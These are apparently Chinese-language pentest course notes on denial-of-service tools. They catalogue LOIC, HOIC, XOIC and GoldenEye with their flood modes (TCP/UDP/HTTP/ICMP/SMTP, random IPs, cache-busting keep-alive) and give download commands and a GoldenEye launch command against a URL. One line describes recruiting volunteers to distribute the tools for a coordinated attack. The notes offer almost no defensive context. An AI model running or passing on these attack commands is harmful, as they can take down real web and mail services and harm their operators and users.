grep dos /usr/share/nmap/scripts/scripts.db | cut -d "\"" -f 2
● LOIC
● HOIC
● DDoSer
● 招募志愿者发发放以上工具
● 以上DoS工具不隐藏真实IP地址



git clone git://git.code.sf.net/p/xoic/code xoic-code
● https://xoicdoser.wordpress.com/
● 三种模式:test、normal、DoS Attack
● 支持协议:TCP/HTTP/UDP/ICMP
● Python脚本
● 随机产生大量唯一的地址请求,避免缓存命中
● 耗尽WEB服务器资源池
● 7层拒绝服务工具(模拟多个僵尸机)
● 随机IP地址
● 基于TCP连接的攻击
● 应用层DDoS攻击
● 正常的HTTP请求,非正常的HTTP请求式DDoS
● SMTP DDoS
● 随机端口的TCP连接洪水
● http/https拒绝服务工具
● 安全研究为目的Python工具
● 随机攻击向量,keep-alive,避免缓存命中
wget https://github.com/jseidl/GoldenEye/archive/master.zip
unzip master.zip

python goldeneye.py http://1.1.1.1 -w 50 -m random
